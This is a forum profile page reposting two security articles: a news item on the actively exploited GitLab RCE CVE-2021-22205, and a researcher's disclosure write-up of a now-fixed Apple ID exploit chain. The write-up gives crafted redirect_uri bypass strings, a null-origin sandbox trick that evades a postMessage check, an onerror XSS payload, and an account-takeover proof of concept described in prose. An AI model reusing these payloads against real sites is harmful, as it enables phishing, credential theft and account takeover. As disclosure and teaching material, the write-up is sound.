Jump to content

akkiliON

Active Members
  • Posts

    1135
  • Joined

  • Last visited

  • Days Won

    18

akkiliON last won the day on October 6

akkiliON had the most liked content!

Reputation

539 Excellent

2 Followers

About akkiliON

  • Rank
    Retired
    Apprentice
  • Birthday 01/01/1970

Recent Profile Visitors

4396 profile views
  1. A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks. Tracked as CVE-2021-22205, the issue relates to an improper validation of user-provided images that results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, has since been addressed by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3. In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly-accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions. Although the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021 owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday. Despite the public availability of the patches for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of the instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In the light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible. "In addition, ideally, GitLab should not be an internet facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html
  2. Everyone knows what’s inside a computer isn’t really real. It pretends to be, sure, hiding just under the pixels — but I promise you it isn’t. In the real world, everything has a certain mooring we’re all attuned to. You put money in a big strong safe, and, most likely if somehow it opens there will be a big sound, and a big hole. Everything has a footprint, everything has a size, there are always side-effects. As the electrons wiggle, they’re expressing all these abstract ideas someone thought up sometime. Someone had an idea of how they’d dance, but that’s not always true. Instead, there are half-formed ideas, ideas that change context and meaning when exposed to others, and ideas that never really quite made sense. The Alice in Wonderland secret of computers is that the dancers and their music are really the same. It’s easy to mistakenly believe that each word I type is shuffled by our pixie friends along predefined chutes and conveyors to make what we see on screen, when in reality each letter is just a few blits and bloops away from being something else entirely. Sometimes, if you’re careful, you can make all those little blits and bloops line up in a way that makes the dance change, and that’s why I’ve always loved hacking computers: all those little pieces that were never meant to be put together that way align in unintended but beautiful order. Each individual idea unwittingly becomes part of a greater and irrefutable whole. Before the pandemic, I spent a lot of time researching the way web of YouTube, Wikipedia and Twitter meets the other world of Word, Photoshop and Excel to produce Discord, 1Password, Spotify, iTunes, Battle.net and Slack. Here all the wonderful and admittedly very pointy and sharp benefits of the web meet the somewhat softer underbelly of the ‘Desktop Application’, the consequences of which I summarised one sunny day in Miami. I’m not really a very good security researcher, so little of my work sees the light of day because the words don’t always form up in the right order, but my experience then filled me with excitement to publish more. And so, sitting again under the fronds of that tumtum tree, I found more — and I promise you what I found then was as exciting as what I’ll tell you about now. But I can’t tell you about those. Perhaps naïve, it didn’t occur to me before that the money companies give you for your security research is hush money, but I know that now — and I knew that then, when I set out to hack Apple ID. At the time, Apple didn’t have any formal way of paying you for bugs: you just emailed them, and hoped for the best. Maybe you’d get something, maybe you wouldn’t — but there is certainly nothing legally binding about sending an email in the way submitting a report to HackerOne is. That appealed to me. Part 1: The Doorman’s Secret Computer systems don’t tend to just trust each other, especially on the web. The times they do usually end up being mistakes. Let me ask you this: when you sign into Google, do you expect it to know what you watched on Netflix? Of course not. That’s down to a basic rule of the web: different websites don’t default to sharing information to each other. ICloud, then is a bit of a curiosity. It has its own domain, icloud.com, entirely separate from Apple’s usual apple.com yet its core feature is of course logging into your Apple iCloud account. More interestingly still, you might notice that most login systems for, say, Google, redirect you through a common login domain like accounts.google.com, but iCloud’s doesn’t. Behind the looking-glass, Apple has made this work by having iCloud include a webpage that is located on the AppleID server, idmsa.apple.com. The page is located at this address: https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&language=en_US&iframeId=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d&redirect_uri=https://www.icloud.com&response_type=code&response_mode=web_message&state=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&authVersion=latest Here, Apple is using OAuth 2, a capability based authentication framework. ‘Capability based’ is key here, because it means that a login from Apple.com doesn’t necessarily equate to one from iCloud.com, and also not all iCloud logins are necessarily the same either — that’s how Find My manages to skip a second-factor check to find your phone. This allows Apple to (to some extent) reduce the blast radius of security issues that might otherwise touch iCloud. This is modified, however, to allow the login to work embedded in another page. response_mode=web_message seems to be a switch that turns this on. If you visit the address, you’ll notice the page is just blank. This is for good reason: if anyone could just show the Apple iCloud login page then you could play around with the presentation of the login page to steal Apple user data (‘Redress Attack’). Apple’s code is detecting that it’s not being put in the right place and blanks out the page. In typical OAuth, the ‘redirect_uri’ specifies where the access is being sent to; in a normal, secure form, the redirect uri gets checked against what’s registered for the other, ‘client_id’ parameter to make sure that it’s safe for Apple to send the special keys that grant access there — but here, there’s no redirect that would cause that. In this case the redirect_uri parameter is being used for a different purpose: to specify the domain that can embed the login page. In a twist of fate, this one fell prey to a similar bug to the one from how to hack the uk tax system, i guess, which is that web addresses are extraordinarily hard to compare safely. Necessarily, something like this parameter must pass through several software systems, which individually probably have subtly different ways of interpreting the information. For us to be able to bypass this security control, we want the redirect_uri checker on the AppleID server to think icloud.com, and other systems to think something else. URLs, web addresses are the perfect conduit for this. Messing with the embed in situ in the iCloud page with Chrome Devtools, I found that a redirect_uri of ‘https://abc@www.icloud.com’ would pass just fine, despite it being a really weird way of saying the same thing. The next part of the puzzle is how do we get the iCloud login page into our page? Consult this reference on embed control: X-Frame-Options: DENY Prevents any kind of embedding pros: ancient, everyone supports it cons: the kids will laugh at you; if you want only some embedding, you need some complicated and unreliable logic X-Frame-Options: ALLOW-FROM http://example.com Only allows embedding from a specific place pros: A really good idea from a security perspective cons: was literally only supported by Firefox and Internet Explorer for a short time so using it will probably make you less secure Content-Security-Policy: frame-ancestors Only allows embedding from specific place(s) pros: new and cool, there are probably TikToks about how to use it; prevents embeds-in-embeds bypassing your controls cons: probably very old browsers will ignore it If you check Chrome DevTools’s ‘network’ panel, you will find the AppleID signon page uses both X-Frame-Options: ALLOW-FROM (which essentially does nothing), and Content-Security-Policy: frame-ancestors. Here’s a cut-down version of what the Content-Security-Policy header looks like when ‘redirect_uri’ is set to the default “https://www.icloud.com/” Content-Security-Policy: frame-ancestors ‘self’ https://www.icloud.com This directs the browser to only allow embeds in iCloud. Next, what about our weirder redirect_uri, https://abc@icloud.com? Content-Security-Policy: frame-ancestors ‘self’ https://abc@www.icloud.com Very interesting! Now, humans are absolute fiends for context-clues. Human language is all about throwing a bunch of junk together and having it all picked up in context, but computers have a beautiful, childlike innocence toward them. Thus, I can set redirect_uri to ‘https://mywebsite.com;@icloud.com/’, then, the AppleID server continues to think all is well, but sends: Content-Security-Policy: frame-ancestors ‘self’ https://mywebsite.com;@www.icloud.com This is because the ‘URI’ language that’s used to express web addresses is contextually different to the language used to express Content Security Policies. ‘https://mywebsite.com;@www.icloud.com’ is a totally valid URL, meaning the same as ‘https://www.icloud.com’ but to Content-Security-Policy, the same statement means ‘https://mywebsite.com’ and then some extra garbage which gets ignored after the ‘;’. Using this, we can embed the Apple ID login page in our own page. However, not everything is quite as it seems. If you fail to be able to embed a page in chrome, you get this cute lil guy: But, instead we get a big box of absolutely nothing: Part 2: Communicating with the blank box Our big box, though blank, is not silent. When our page loads, the browser console gives us the following cryptic message: {"type":"ERROR","title":"PMRPErrorMessageSequence","message":"APPLE ID : PMRPC Message Sequence log fail at AuthWidget.","iframeId":"601683d3-4d35-4edf-a33e-6d3266709de3","details":"{\"m\":\"a:28632989 b:DEA2CA08 c:req h:rPR e:wSR:SR|a:28633252 b:196F05FD c:req h:rPR e:wSR:SR|a:28633500 b:DEA2CA08 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28633598 b:B74DD348 c:req h:rPR e:wSR:SR|a:28633765 b:196F05FD c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634110 b:BE7671A8 c:req h:rPR e:wSR:SR|a:28634110 b:B74DD348 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634621 b:BE7671A8 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28635123 b:E6F267A9 c:req h:rPR e:wSR:SR|a:28635130 b:25A38CEC c:req h:r e:wSR:SR|a:28635635 b:E6F267A9 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28636142 b:25A38CEC c:rRE f:Application error. Destination unavailable. 1000 h:r e:f2:rRE\",\"pageVisibilityState\":\"visible\"}"} This message is mostly useless for discerning what exactly is going wrong. At this point, I like to dig more into the client code itself to work out the context of this error. The Apple ID application is literally millions of lines of code, but I have better techniques — in this case, if we check the Network panel in Chrome DevTools, we can see that when an error occurs, a request is sent to ‘https://idmsa.apple.com/appleauth/jslog’, assumedly to report to Apple that an error occurred. Chrome DevTools’ ‘sources’ panel has a component on the right called “XHR/fetch Breakpoints” which can be used to stop the execution of the program when a particular web address is requested. Using this, we can pause the application at the point the error occurs, and ask our debugger to go backwards to the condition that caused the failure in the first place. Eventually, stepping backward, there’s this: new Promise(function(e, n) { it.call({ destination: window.parent, publicProcedureName: "ready", params: [{ iframeTitle: d.a.getString("iframeTitle") }], onSuccess: function(t) { e(t) }, onError: function(t) { n(t) }, retries: p.a.meta.FEConfiguration.pmrpcRetryCount, timeout: p.a.meta.FEConfiguration.pmrpcTimeout, destinationDomain: p.a.destinationDomain }) } The important part here is window.parent, which is our fake version of iCloud. It looks like the software inside AppleID is trying to contact our iCloud parent when the page is ready and failing over and over (see: retries). This communication is happening over the postMessage (the ‘pm’ of pmrpc ). Lastly, the code is targeting a destinationDomain, which is likely set to something like https://www.icloud.com ; then, since our embedding page is not that domain, there’s a failure. We can inject code into the AppleID Javascript and the iCloud javascript to view their version of this conversation: AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”receivePingRequest”,”params”:[“ready”],”id”:”9BA799AA-6777–4DCC-A615-A8758C9E9CE2"} AppleID tells iCloud it’s ready to receive messages. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”9BA799AA-6777–4DCC-A615-A8758C9E9CE2",”result”:true} iCloud responds to the ping request with a ‘pong’ response. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”ready”,”params”:[{“iframeTitle”:” Sign In with Your Apple ID”}],”id”:”E0236187–9F33–42BC-AD1C-4F3866803C55"} AppleID tells iCloud that the frame is named ‘Sign in with Your Apple ID’ (I’m guessing to make the title of the page correct). iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”E0236187–9F33–42BC-AD1C-4F3866803C55",”result”:true} iCloud acknowledges receipt of the title. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”receivePingRequest”,”params”:[“config”],”id”:”87A8E469–8A6B-4124–8BB0–1A1AB40416CD”} AppleID asks iCloud if it wants the login to be configured. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”87A8E469–8A6B-4124–8BB0–1A1AB40416CD”,”result”:true} iCloud acknowledges receipt of the configuration request, and says that it does, yes want the login to be configured. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”config”,”params”:[],”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”} AppleID asks iCloud for a login dialog configuration. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”,”result”:{“data”:{“features”:{“rememberMe”:true,”createLink”:false,”iForgotLink”:true,”pause2FA”:false},”signInLabel”:”Sign in to iCloud”,”serviceKey”:”d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d”,”defaultAccountNameAutoFillDomain”:”icloud.com”,”trustTokens”:[“HSARMTnl/S90E=SRVX”],”rememberMeLabel”:”keep-me-signed-in”,”theme”:”dark”,”waitAnimationOnAuthComplete”:false,”logo”:{“src”:”data:image/png;base64,[ … ]ErkJggg==”,”width”:”100px”}}}} iCloud configures the login dialog. This includes data like the iCloud logo to display, the caption “Sign in to iCloud”, and, for example whether a link should be provided for if the user forgets their password. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”,”result”:true} iCloud confirms receipt of the login configuration. In order to make our bootleg iCloud work, we will need code that completes the conversation in the same way. You can look at a version I made, here. Our next problem is that destinationDomain I pointed out before: postMessage ensures that snot-nosed kids trying to impersonate iCloud can’t just impersonate iCloud — by having every postMessage have a targetOrigin, basically a specified destination of the webpage. It’s not enough that the message gets sent to window.parent; that parent must also be securely specified to prevent information going the wrong place. Part 3: Snot-Nosed Kid Mode This one isn’t as easy as reading what AppleID does and copying it. We need to find another security flaw between our single input, redirect_uri , through to destinationDomain, and then finally on to postMessage. Again, the goal here is to find some input redirect_uri that still holds the exploit conditions from Part 1, but also introduces new exploit conditions for this security boundary. By placing a breakpoint at the destinationDomain line we had before, we can see that unlike both the AppleID server and Content-Security-Policy, the whole redirect_uri parameter, ‘https://mywebsite.com;@wwwicloud.com’ is being passed to postMessage, as though it were this code: window.parent.postMessage(data_to_send, "https://mywebsite.com;@www.icloud.com"); At first, this seems like an absolute impasse. In no possible way is our page going to be at the address ‘https://mywebsite.com;@www.icloud.com’. However, once you go from the reference documentation, to the technical specification the plot very much thickens. In section 9.4.3 of the HTML standard, the algorithm for comparing postMessage origins is specified, and step 5 looks like this: Let parsedURL be the result of running the URL parser on targetOrigin. If parsedURL is failure, then throw a “SyntaxError" DOMException. Set targetOrigin to parsedURL’s origin. Crucially, despite “https://mywebsite.com;@www.icloud.com” being not at all a valid place to send a postMessage, the algorithm extracts a valid origin from it (i.e. it becomes https://www.icloud.com). Again, this allows us purchase to sneak some extra content in there to potentially confuse other parts of AppleID’s machinery. The source for the AppleID login page starts with a short preamble that tells the AppleID login framework what the destination domain (in this case iCloud) is for the purpose of login: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;@www.icloud.com"); This information eventually bubbles down to the destinationDomain we’re trying to mess with. When toying with ‘redirect_uri’, I found that there’s a bug in the way this functionality is programmed in Apple’s server. For an input ‘https://mywebsite.com;"@www.icloud.com’ (note the double quote), this code is produced: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); The double quote is ‘escaped’ with a ‘\’ to ensure that we don’t break out of the quoted section and start executing our own code, however something a little odd happens when we input instead ‘https://mywebsite.com;%22@www.icloud.com’. ‘%22’ is what you get from ‘encodeURIComponent’ of a double quote, the opposite of what apple is doing here. bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); We get exactly the same response! This means that Apple is already doing a decodeURIComponent on the server before it even reaches this generated Javascript. Then, the generated Javascript is again performing the same decoding. Someone made the mistake of doing the same decoding on the client and server, but it didn’t become a functionality breaking bug because the intended usage doesn’t have any doubly encoded components. We can, however introduce these. 😉 Because the server is using the decodeURIComponent-ed form, and the client is using the twice decodeURIComponent-ed form, we can doubly encode special modifier characters in our URI that we want only the client to see — while still passing all the server-side checks! After some trial and error, I determined that I can set redirect_uri to: https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com This order of operations then happens: AppleID’s server decodeURIComponent-s it, producing: https://mywebsite.com%3F mywebsite.com;@www.icloud.com AppleID’s server parses the origin from https://mywebsite.com%3F mywebsite.com;@www.icloud.com , and gets https://www.icloud.com , which passes the first security check AppleID’s server takes the once-decodeURIComponent-ed form and sends Content-Security-Policy: allow-origin https://mywebsite.com%3F mywebsite.com;@www.icloud.com The browser parses the Content-Security-Policy directive and parses out origins again, allowing embedding of the iCloud login from both ‘https://mywebsite.com%3f’ (which is nonsense) and ‘mywebsite.com’ (which is us!!!!). This passes the second security check and allows the page to continue loading. AppleID’s server generates the sign in page with the Javascript bootData.destinationDomain = decodeURIComponent(“https://mywebsite.com%3F mywebsite.com;@www.icloud.com"); The second decodeURIComponent sets bootData.destinationDomain to https://mywebsite.com? mywebsite.com;@www.icloud.com When the AppleID client tries to send data to www.icloud.com, it sends it to https://mywebsite.com? mywebsite.com;@www.icloud.com The browser when performing postMessage parses an origin again again (!!) from https://mywebsite.com? mywebsite.com;@www.icloud.com . The ‘?’ causes everything after it to be ignored, resulting in the target origin ‘https://mywebsite.com’. This passes the third security check. However, this is only half of our problems, and our page will stay blank. Here’s what a blank page looks like, for reference: Part 4: Me? I’m Nobody. Though now we can get messages from iCloud, we cannot perform full initialisation of the login dialog without also sending them. However, AppleID checks the senders of all messages it gets, and that mechanism is also totally different from the one that is used for a postMessage send. The lowest-level browser mechanism that AppleID must be inevitably calling sadly does not perform some abusable parse step beforehand. A typical message origin check looks like this: if (message.origin != "https://safesite.com") throw new Error("hey!! thats illegal!"); This is just a ‘strict string comparison’, which means that we would, in theory have to impossibly be the origin https://mywebsite.com? mywebsite.com;@www.icloud.com which has no chance of ever happening on God’s green earth. However, the PMRPC protocol is actually open source, and we can view its own version of this check online. Receipt of a message is handled by ‘processJSONRpcRequest’, defined in ‘pmrpc.js’. Line 254 decides if the request needs to be checked for security via an ACL (Access Control List) as follows: 254: !serviceCallEvent.shouldCheckACL || checkACL(service.acl, serviceCallEvent.origin) This checks a value called ‘shouldCheckACL’ to determine if security is disabled, I guess 😉 That value, in turn comes from line 221: 221: shouldCheckACL : !isWorkerComm And then isWorkerComm comes to us via lines 205–206: 205: var eventSource = eventParams.source; 206: var isWorkerComm = typeof eventSource !== "undefined" && eventSource !== null; ‘eventParams’ is the event representing the postMessage, and ‘event.source’ is a reference to the window (i.e. page) that sent the message. I’d summarise this check as follows: if (message.source !== null && !(message.origin === "https://mywebsite.com? mywebsite.com;@www.icloud.com")) That means the origin check is completely skipped if message.source is ‘null’. Now, I believe the intention here is to allow rapid testing of pmrpc-based applications: if you are making up a test message for testing, its ‘source’ can be then set to ‘null’, and then you no longer need to worry about security getting in the way. Good thing section 9.4.3, step 8.3 of the HTML standard says a postMessage event’s source is always a ‘WindowProxy object’, so it can never be ‘null’ instead, right? Ah, but section 8.6 of the HTML standard defines an iframe sandboxing flag ‘allow-same-origin’, which, if not present in a sandboxed iframe sets the ‘Sandboxed origin browsing context flag’ (defined in section 7.5.3) which ‘forces the content into a unique origin’ (defined in section 7.5.5), which makes the window an ‘opaque origin’ (defined in section 7.5), which when given to Javascript is turned into null (!!!!). This means when we create an embedded, sandboxed frame, as long as we don’t provide the ‘allow-same-origin’ flag, we create a special window that is considered to be null , and thus bypasses the pmrpc security check on received messages. A ‘null’ page however, is heavily restricted, and, importantly, if our attack page identifies as null via this trick, all the other checks we worked so hard to bypass will fail. Instead, we can embed both Apple ID with all the hard work we did before, and a ‘null’ page. We can still postMessage to the null page, so we use it to forward our messages on to Apple ID, which thinks since it is a ‘null’ window, it must have generated them itself. You can read my reference implementation of this forwarding code, here. Part 5: More than Phishing Now that AppleID thinks we’re iCloud, we can mess around with all of those juicy settings that it gets. How about offering a free Apple gift card to coerce the user into entering their credentials? In our current state, having tricked Apple ID into thinking that we’re iCloud, we have a little box that fills in your apple email very nicely. When you log in to our embed we get an authentication for your Apple account over postMessage. Even if you don’t 2FA! This is because an authentication token is granted without passing 2FA for iCloud ‘Find My’, used for finding your potentially lost phone (which you might need to pass 2FA otherwise). However, this is basically phishing — although this is extremely high-tech phishing, I have no doubt the powers that be will argue that you could just make a fake AppleID page just the same. We need more. We’re already in a position of extreme privilege. Apple ID thinks we’re iCloud, so it’s likely that our interactions with the Apple ID system will be a lot more trusting with what we ask of it. As noted before, we can set a lot of configuration settings that affect how the login page is displayed: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ ... ]ErkJggg==","width":"100px"}}}} That’s all well and good, but what about the options that iCloud can use, but simply chooses not to? They won’t be here, but we can use Chrome DevTools’ ‘code search’ feature to search all the code the Apple ID client software uses. ‘signInLabel’ makes a good search term as it probably doesn’t turn up anywhere else: d()(w.a, "envConfigFromConsumer.signInLabel", "").trim() && n.attr("signInLabel", w.a.envConfigFromConsumer.signInLabel), It looks like all of these settings like ‘signInLabel’ are part of this ‘envConfigFromConsumer’, so we can search for that: this.attr("testIdpButtonText", d()(w.a, "envConfigFromConsumer.testIdpButtonText", "Test")) d()(w.a, "envConfigFromConsumer.accountName", "").trim() ? (n.attr("accountName", w.a.envConfigFromConsumer.accountName.trim()), n.attr("showCreateLink", d()(w.a, "envConfigFromConsumer.features.createLink", !0)), n.attr("showiForgotLink", d()(w.a, "envConfigFromConsumer.features.iForgotLink", !0)), n.attr("learnMoreLink", d()(w.a, "envConfigFromConsumer.learnMoreLink", void 0)), n.attr("privacyText", d()(w.a, "envConfigFromConsumer.privacy", void 0)), n.attr("showFooter", d()(w.a, "envConfigFromConsumer.features.footer", !1)), n.attr("showRememberMe") && ("remember-me" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() ? n.attr("rememberMeText", l.a.getString("rememberMe")) : "keep-me-signed-in" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() && n.attr("rememberMeText", l.a.getString("keepMeSignedIn")), n.attr("isRememberMeChecked", !!d()(w.a, "envConfigFromConsumer.features.selectRememberMe", !1) || !!d()(w.a, "accountName", "").trim())), i = d()(w.a, "envConfigFromConsumer.verificationToken", ""), These values we know from our config get given different names to put into a template. For example, ‘envConfigFromConsumer.features.footer’ becomes ‘showFooter’. In DevTools’ network panel, we can search all resources, code and otherwise the page uses for where these inputs end up: {{#if showRememberMe}} <div class="si-remember-password"> <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox" {($checked)}="isRememberMeChecked"> <label id="remember-me-label" class="form-label" for="remember-me"> <span class="form-choice-indicator"></span> {{rememberMeText}} </label> </div> What a lovely blast from the past! These are handlebars templates, a bastion of the glorious web 2.0 era I started my career in tech in! Handlebars has a bit of a dirty secret. ‘{{value}}’ statements work like you expect, safely putting content into the page; but ‘{{{value}}}’ extremely unsafely injects potentially untrusted HTML code — and for most inputs looks just the same! Let’s see if an Apple engineer made a typo by searching the templates for “}}}”: {{#if showLearnMoreLink}} <div> {{{learnMoreLink}}} </div> {{/if}} {{#if showPrivacy}} <div class="label-small text-centered centered tk-caption privacy-wrapper"> <div class="privacy-icon"></div> {{{privacyText}}} </div> {{/if}} Perfect! From our previous research, we know that ‘privacyText’ comes from the configuration option ‘envConfigFromConsumer.privacy’, or just ‘privacy’. Once we re-configure our client to send the configuration option { "privacy": "<img src=fake onerror='alert(document.domain)'" } , Apple ID will execute our code and show a little popup indicating what domain we have taken over: Part 6: Overindulgence Now it’s time to show off. Proof of concepts are all about demonstrating impact, and a little pop-up window isn’t scary enough. We have control over idmsa.apple.com, the Apple ID server browser client, and so we can access all the credentials saved there — your apple login and cookie — and in theory, we can ‘jump’ to other apple login windows. Those credentials are all stored in a form that we can use to take over an apple account, but they’re not a username and password. That’s what I think of as scary. For my proof of concept, I: Execute my full exploit chain to take over Apple ID. This requires only one click from the user. Present the user with a ‘login with AppleID’ button by deleting all the content of the Apple ID login page and replacing it with the standard button Open a new window to the real, full Apple ID login page, same as apple would when the button is clicked With our control of idmsa.apple.com, take control over the real Apple ID login dialog and inject our own code which harvests the logins as they are typed Manipulate browser history to set the exploit page location to https://apple.com, and then delete the history record of being on the exploit page — if the user checks if they came from a legitimate Apple site, they’ll just see apple.com and be unable to go back. Full commented source code can be found here. Video demonstration of the Proof of Concept on desktop Although I started this project before apple had its bug bounty program, I reported it just as the bug bounty program started and so I inadvertently made money out of it. Apple paid me $10,000 for my bug and proof of concept, which, while I’m trying not to be a shit about it, is 2.5 times lower than the lowest bounty on their Example Payouts page, for creating an app that can access “a small amount of sensitive data”. Hopefully other researchers are paid more! I also hope this was an interesting read! I took a really long time to write this with the pandemic kind of sapping my energy, and my sincere hope that despite the technical complexity here, I could write something accessible to those new to security. Thomas Thanks to perribus, iammandatory, and taviso for reviewing earlier versions of this disclosure. If Apple is reading this, please do something about my other bug reports, it has been literally years, and also add my name to the Apple Hall of fame 🥺🥺 Full timeline follows this article. edit: Apple says my Hall of Fame will happen in September! edit: September is almost over and it hasn’t happened! Timeline Report to fix time: 3 days Fix to offer time: 4 months, 3 days Payment offer to payment time: 4 months, 5 days Total time: 8 months, 8 days Friday, November 15th 2019 First apple bug, an XSS on apple.com reported Saturday, November 16th 2019 Issues noticed in Apple ID The previous bug I reported has been mitigated, but no email from Apple about it Thursday, November 21st 2019, 3:43AM GMT First proof of concept sent to Apple demonstrating impersonating iCloud to Apple ID, using it to steal Apple user’s information. Thursday, November 21st 2019, 6:06AM GMT Templated response from Apple, saying they’re looking into it Thursday, November 21st 2019, 8:20PM GMT Provided first Apple ID proof of concept which injects malicious code, along with some video documentation. Sunday, November 24th 2019 The issue is mitigated (partially fixed) by Apple Thursday, November 28th 2019 Ask for updates Wednesday, December 4th 2019 I try to pull some strings with friends to get a reply Tuesday, December 3rd 2019 Apple tells me there is nothing to share with me December 10th 2019 I ask if there is an update Friday, January 10th 2019 I get an automated email saying, in essence (1) don’t disclose the bug to the public until ‘investigation is complete’ and (2) Apple will provide information over the course of the investigation. Email for an update Wednesday, January 29th 2020 Ask for another update (at the 2 month mark) Friday, January 31st 2020 Am asked to check if it’s been fixed. Yes, but not exactly in the way I might have liked. Sunday, February 2nd 2020 At Schmoocon, a security conference in Washington DC I happen to meet the director of the responsible disclosure program. I talk about the difficulties I’ve had. Tuesday, February 4th 2020 Apple confirms the bug as fixed and asks for my name to give credit on the Apple Hall of Fame as of August 2021, I have still not been publicly credited. I reply asking if this is covered by the bounty program. Apple responds saying that they will let me know later. Saturday, February 15th 2020 I ask for an update on status Monday, February 17th 2020 Apple responds: no updates. I ask when I’ll hear back Friday, February 21st 2020 I contact the director of the program with the details I got at schmoo, asking when the expected turnaround on bugs is Monday, March 2nd 2020 Apple responds. They say they have no specfic date Tuesday, March 3rd 2020 The director responds, saying they don’t give estimates on timelines, but he’ll get it looked into Tuesday, March 24th 2020 Offered $10,000 for the Apple ID code injection vulnerability. Asked to register as an Apple developer so I can get paid through there Sunday, March 29th 2020 Enroll in the Apple Developer program, and ask when I’ll be able to disclose publicly. Tuesday, March 31st 2020 Told to accept the terms and set up my account and tax information (I am not told anything about disclosure) Tuesday, March 31st 2020 Ask for more detailled instructions, because I can’t find out how to set up my account and tax information (this is because my Apple Developers application has not yet been accepted) Thursday, April 2nd 2020 Ask if this is being considered as a generic XSS because the payout seems weird compared to the examples Tuesday, April 28th Apple replies to request for more detailed instructions (it’s the same thing, but reworded) May 13th 2020 I ask for an update May 18th 2020 Am told the money is “in process to be paid”, with no exact date but expected in May or early June. They’ll get back when they know. May 23rd 2020 I am told my information has been sent to the accounts team, and that Apple will contact me about it when appropriate. May 18th 2020 I ask again when I can disclose. June 8th 2020 I ask for some kind of update on payment or when I can disclose. June 10th 2020 I am informed that there is ‘a new process’. The new process means I pay myself for my Apple Developers account, and Apple reimburses me that cost. I tell Apple I did this several months ago, and ask how my bug was classified within the program. I also contact the Apple security director asking if I can get help. He’s no longer with Apple. June 15th 2020 Apple asks me to provide an ‘enrolment ID’. June 15th 2020 I send apple a screenshot of what I am seeing. All my application shows is ‘Contact us to continue your enrolment’. I say I’m pretty frustrated and threaten to disclose the vulnerability if I am not given some way forward on several questions: (1) how the bug was classified (2) when I can disclose this and (3) what I am missing to get paid I also rant about it on twitter, which was probably the most productive thing I did to get a proper response in retrospect June 19th 2020 Apple gets in touch, saying they’ve completed the account review and now I need to set up a bank account to get paid in. Apple says they’re OK with disclosing, as long as the issue is addressed in an update. Apple asks for a draft of my disclosure Thursday, July 2nd 2020 The Apple people are very gracious. They say thanks for the report, and say my writeup is pretty good. Whoever is answering is very surprised by, and asks me to correct where I say I found this bug only “a few days ago” in the draft I wrote 🤔 July 29th 2020 I get paid … the pandemic happens 12 August 2021 I finish my writeup! Amendments 22/Aug/21: Fixed link to ‘full source code’, which originally linked to only a very small portion of the full source. Source: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41
